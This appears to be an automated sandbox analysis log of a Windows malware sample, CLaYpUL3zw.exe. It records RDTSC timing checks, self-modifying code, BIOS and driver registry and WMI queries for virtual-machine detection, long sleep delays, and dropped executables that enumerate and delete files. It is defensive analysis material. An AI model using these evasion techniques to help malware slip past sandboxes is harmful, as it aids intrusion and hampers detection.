Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7B583 second address: F7B5B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FA030CAD666h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA030CAD679h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7B5B2 second address: F7B5B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7C14E second address: F7C154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F7C154 second address: F7C158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8162F second address: F81668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030CAD674h 0x00000011 jmp 00007FA030CAD679h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F849BA second address: F849C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F849C3 second address: F849DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030CAD670h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F84B23 second address: F84B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA030F107A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F84B2D second address: F84B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD675h 0x00000007 je 00007FA030CAD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FA030CAD673h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F84E34 second address: F84E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107ABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F84FA3 second address: F84FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F84FA7 second address: F84FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F85108 second address: F8510C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8510C second address: F8511A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8511A second address: F8511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8511E second address: F85122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8529F second address: F852A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F852A4 second address: F852D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B4h 0x00000009 jmp 00007FA030F107B7h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F852D8 second address: F852DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8B441 second address: F8B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8BD86 second address: F8BD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8CBAE second address: F8CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8CBB4 second address: F8CBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8CBB8 second address: F8CBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F8CBBE second address: F8CBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA030CAD66Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F958BA second address: F958BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F958BE second address: F958FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FA030CAD678h 0x00000011 jmp 00007FA030CAD66Eh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECB76F second address: ECB7C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 jmp 00007FA030F107ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA030F107B5h 0x00000016 jno 00007FA030F107A6h 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FA030F107ACh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECB7C4 second address: ECB7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECB7C9 second address: ECB7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECB7D1 second address: ECB7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: ECB7D7 second address: ECB7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA030F107AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FA9097 second address: FA909D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FA909D second address: FA90A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FAEC9E second address: FAECA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA030CAD666h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FAD8BB second address: FAD8C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FAD8C9 second address: FAD8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FAD8CD second address: FAD8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FB73BC second address: FB73C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBF794 second address: FBF798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBE1D6 second address: FBE1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBE32E second address: FBE332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBE332 second address: FBE345 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA030CAD666h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBE4AD second address: FBE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA030F107A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBEA0A second address: FBEA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBEA12 second address: FBEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FBEA16 second address: FBEA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FC2ACA second address: FC2ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FC2ACE second address: FC2B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD677h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FA030CAD66Fh 0x00000012 jc 00007FA030CAD66Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FC2B04 second address: FC2B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FC464D second address: FC4666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA030CAD668h 0x00000008 push esi 0x00000009 jnc 00007FA030CAD666h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FC4666 second address: FC466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FCDAD1 second address: FCDAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FCD92D second address: FCD93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FD00ED second address: FD00FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA030CAD668h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FD25F1 second address: FD25F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FDF843 second address: FDF847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE5CBC second address: FE5CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE5CD8 second address: FE5CE8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030CAD66Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE5CE8 second address: FE5CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE5CEE second address: FE5CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE5FAB second address: FE5FB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6119 second address: FE6125 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA030CAD666h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6414 second address: FE6441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FA030F107AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6441 second address: FE6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6446 second address: FE644C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE644C second address: FE6468 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA030CAD666h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA030CAD66Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6468 second address: FE646C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE646C second address: FE6482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE6482 second address: FE6486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE65A1 second address: FE65A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE9A09 second address: FE9A13 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA030F107A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE9A13 second address: FE9A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE9A1C second address: FE9A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B4h 0x00000009 pop ecx 0x0000000a jbe 00007FA030F107AEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE9470 second address: FE9476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE9476 second address: FE947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FF02DA second address: FF02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FF1B06 second address: FF1B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA030F107AFh 0x0000000c popad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f jmp 00007FA030F107B7h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 jbe 00007FA030F107A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FE978E second address: FE9796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA838 second address: FEA844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA844 second address: FEA848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA848 second address: FEA84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA84E second address: FEA85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA030CAD66Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA85C second address: FEA860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: FEA860 second address: FEA865 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F153BD second address: F153F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA030F107B0h 0x00000008 jmp 00007FA030F107AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FA030F107BCh 0x00000018 jmp 00007FA030F107B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1571A second address: F15729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD66Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F15729 second address: F1572F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Special instruction interceptor: First address: D69C17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Special instruction interceptor: First address: D69C98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Special instruction interceptor: First address: F2EC65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Special instruction interceptor: First address: D69C1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Special instruction interceptor: First address: F987BF instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Memory allocated: 5700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Memory allocated: 58F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Memory allocated: 5700000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Window / User API: threadDelayed 4795

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

API coverage: 3.9 %

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe TID: 5516	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 1776	Thread sleep time: -180000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_0055DC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_0056A087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_0056A1E2
